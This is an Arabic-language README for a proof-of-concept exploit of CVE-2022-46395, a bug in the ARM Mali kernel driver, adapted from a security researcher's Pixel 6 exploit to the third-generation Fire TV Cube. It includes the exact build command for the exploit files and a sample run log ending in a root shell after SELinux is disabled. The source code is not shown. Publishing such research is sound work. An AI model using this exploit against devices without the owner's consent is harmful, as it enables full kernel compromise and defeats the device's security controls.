
CVE-2022-46395 إثبات المفهوم لـ FireTV الجيل الثالث Cube (gazelle)
هذا فرع (fork) من "إثبات المفهوم" للباحث الأمني مان يو مو لجهاز Pixel 6 الخاص بـ CVE-2022-46395. اقرأ تقريره التفصيلي عن الثغرة هنا. تم إجراء تعديلات لمراعاة مساحة المستخدم 32 بت في FireOS. يستغل إثبات المفهوم خطأً في برنامج تشغيل نواة ARM Mali للحصول على تنفيذ تعليمات برمجية عشوائية للنواة، والذي يُستخدم بعد ذلك لتعطيل SELinux والحصول على صلاحيات الجذر.
تم تصحيح الثغرة في PS7664/3772 (سبتمبر 2023). للرجوع، تم استخدام الأمر التالي للترجمة باستخدام clang في ndk-21:
android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/armv7a-linux-androideabi28-clang -DSHELL mali_user_buf.c mempool_utils.c mem_write.c -o gazelle_buf
للحصول على أسرع النتائج، قم بتشغيله بعد إعادة تشغيل حديثة. في المتوسط، يستغرق إثبات المفهوم 20-60 ثانية للحصول على صلاحيات الجذر.
gazelle:/ $ /data/local/tmp/gazelle_buf
fingerprint: Amazon/gazelle/gazelle:9/PS7652.3564N/0028488625152:user/amz-p,release-keys
benchmark_time 102
failed after 100
finished reset: 919423975 fault: 918468559 3795 err 0 read 3
found pgd at page 8
overwrite addr : 104100558 558
overwrite addr : 104300558 558
overwrite addr : 10410082c 82c
overwrite addr : 10430082c 82c
result 50
success after 128
gazelle:/ #